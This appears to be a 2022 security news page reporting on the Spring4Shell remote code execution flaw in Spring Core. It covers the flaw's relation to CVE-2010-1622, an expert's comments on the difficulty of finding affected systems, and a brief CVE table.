Security News > 2022 > March > Spring4Shell: No need to panic, but mitigations are advised
Security teams around the world got another shock on Thursday when news of disclosure of a PoC for an unauthenticated RCE zero-day vulnerability in Spring Core, a massively popular framework for building modern Java-based enterprise applications, began circulating online.
Thanks to many security researchers, the situation is a bit clearer today and there's no need to panic just yet: Unlike Log4Shell, this new flaw - with no official CVE and currently nicknamed Spring4Shell - seems to only be exploitable in certain configurations.
First and foremost: Spring4Shell is not the recently patched RCE vulnerability in the Spring Cloud Function library.
According to researchers with Praetorian, Spring4Shell is a bypass of an incomplete patch for CVE-2010-1622, an old code injection vulnerability in the Spring Core Framework, and affects Spring Core on Java Development Kit version 9 or later.
"When zero day exploits like Spring4Shell come to light, organizations immediately are thrust into panic mode, scrambling to determine the potential blast radius of the vulnerability. Given the broad use of Apache Tomcat by developers, this remote code execution vulnerability has huge potential impact. Security teams need to immediately understand what software and devices might be affected and identify whether there are any vulnerable devices in their environment. This can be remarkably challenging because many organizations struggle to maintain an up-to-date inventory of devices, let alone possess the ability to detect software types and versions running on those devices," says Jeff Costlow, CISO at ExtraHop.
"We know at this point that the remote code execution vulnerability is present in the Java Spring framework, but it may also be present in other Java applications. It affects Tomcat, a very common connector that joins together a webserver and the Java application. We suspect there may be other vulnerable applications, but are focusing on the attacks that are in the wild. We have reports of scanning already for this vulnerability so it is only a matter of time before a fully weaponized PoC is leveraged."
News URL
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | RISK |
---|---|---|---|
2010-06-21 | CVE-2010-1622 | Code Injection vulnerability in multiple products SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file. | 0.0 |